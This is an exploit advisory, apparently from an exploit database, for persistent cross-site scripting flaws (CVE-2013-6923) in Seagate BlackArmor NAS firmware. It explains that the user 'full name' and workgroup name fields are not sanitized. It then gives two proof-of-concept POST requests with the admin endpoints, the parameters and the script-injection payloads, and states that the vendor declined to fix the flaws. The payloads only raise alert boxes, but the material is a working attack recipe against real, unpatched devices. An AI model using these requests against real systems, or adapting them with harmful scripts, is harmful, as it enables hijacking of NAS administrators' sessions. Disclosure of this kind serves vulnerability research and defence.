Seagate BlackArmor NAS sg2000-2000.1331 Cross Site Scripting

`# Exploit Title: Seagate BlackArmor NAS - Multiple Persistent Cross Site  
Scripting Vulnerabilities  
  
# Google Dork: N/A  
  
# Date: 04-01-2014  
  
# Exploit Author: Jeroen - IT Nerdbox  
  
# Vendor Homepage: <http://www.seagate.com/> http://www.seagate.com/  
  
# Software Link:  
<http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/  
>  
http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/  
  
# Version: sg2000-2000.1331  
  
# Tested on: N/A  
  
# CVE : CVE-2013-6923  
  
#  
  
## Description:  
  
#  
  
# When adding a user to the device, it is possible to enter a full name.  
This input field does not  
  
# sanitize its input and it is possible to enter any payload which will get  
executed upon reload.  
  
#  
  
# The workgroup configuration is also vulnerable to persistent XSS. The Work  
Group name input  
# field does not sanitize its input.  
  
#  
# This vulnerability was reported to Seagate in September 2013, they stated  
that this will not be fixed.  
  
#  
  
## Proof of Concept #1:  
  
#  
  
# POST: http(s)://<url | ip>/admin/access_control_user_edit.php?id=2&lang=en  
# Parameters:  
  
#  
  
# index = 2  
# fullname = <script>alert(1);</script>  
# submit = Submit  
  
#  
  
#  
  
## Proof of Concept #2:  
  
#  
  
# POST: http(s)://<url |  
ip>/admin/network_workgroup_domain.php?lang=en&gi=n003  
  
# Parameter:  
  
#  
  
# workname = "><input onmouseover=prompt(1) >  
  
`